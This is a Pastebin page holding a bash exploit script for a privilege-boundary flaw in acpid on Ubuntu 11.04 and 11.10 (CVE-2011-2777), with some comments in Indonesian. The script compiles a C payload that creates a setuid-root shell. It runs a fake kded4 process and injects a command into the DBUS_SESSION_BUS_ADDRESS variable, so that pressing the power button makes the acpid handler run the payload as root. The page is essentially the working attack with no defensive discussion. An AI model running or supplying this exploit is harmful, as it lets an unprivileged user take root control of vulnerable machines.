Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################
- # Exploit Title: Acpid Privilege Boundary Crossing Vulnerability #
- # Google Dork: #
- # Date: 23-11-2011 #
- # Author: otr #
- # Software Link: https://launchpad.net/ubuntu/+source/acpid #
- # Version: 1:2.0.10-1ubuntu2 #
- # Tested on: Ubuntu 11.10, Ubuntu 11.04 #
- # CVE : CVE-2011-2777 #
- ##################################################################
- #!/bin/bash
- PAYLOADEXE="/var/crash/payload"
- PAYLOADC="/var/crash/payload.c"
- KDEDC="kded4.c"
- KDEDEXE="kded4"
- TRIGGER="/etc/acpi/powerbtn.sh"
- rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC
- echo "[+] Setting umask ke 0 untuk writable files."
- umask 0
- echo "[+] Preparing binary payload."
- # mencoba untuk mendapatkan suid root shell, jika tidak kita hanya akan mendapatkan
- # shell dari user lain
- cat > $PAYLOADC <<_EOF
- #include <sys/stat.h>
- void main(int argc, char **argv)
- {
- if(!strstr(argv[0],"shell")){
- printf("[+] Preparing suid shell.\n");
- system("cp /var/crash/payload /var/crash/shell");
- setuid(0);
- setgid(0);
- chown ("/var/crash/shell", 0, 0);
- chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
- }else{
- execl("/bin/sh", "/bin/sh", "-i", 0);
- }
- }
- _EOF
- gcc -w -o $PAYLOADEXE $PAYLOADC
- echo "[+] Preparing fake kded4 process."
- cat > $KDEDC <<_EOF
- #include <unistd.h>
- void main (){
- while(42){
- sleep(1);
- if( access( "/var/crash/shell" , F_OK ) != -1 ) {
- execl("/var/crash/shell", "/var/crash/shell", "-i", 0);
- exit(0);
- }
- }
- }
- _EOF
- gcc -w -o $KDEDEXE $KDEDC
- rm -f $KDEDC $PAYLOADC
- echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
- export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"
- echo "[+] Starting kded4."
- echo "[+] Trying to PMS the system."
- echo "[+] Menunggu Tombol power di tekan ."
- echo "[+] anda akan mendapatkan shell pada console ini."
- ./$KDEDEXE
- rm $KDEDEXE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement